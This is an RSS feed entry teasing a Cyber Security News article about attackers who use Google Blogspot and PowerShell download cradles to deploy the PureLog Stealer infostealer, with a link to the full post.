<content:encoded><![CDATA[<p>Hackers have found a clever way to sneak data-stealing malware onto victims’ computers by hiding their tracks inside a trusted platform, Google Blogspot. Researchers recently uncovered a campaign abusing this blogging service alongside native Windows tools to quietly install an information stealer known as PureLog Stealer. The attack begins with something deceptively simple. A file […]</p>
<p>The post <a href="https://cybersecuritynews.com/hackers-abuse-blogspot-and-powershell-download-cradles/">Hackers Abuse Blogspot and PowerShell Download Cradles to Deploy PureLog Steale</a> appeared first on <a href="https://cybersecuritynews.com/">Cyber Security News</a>.</p>]]></content:encoded>
</item>
</channel>
</rss>
<!-- Generated in 1,13ms -->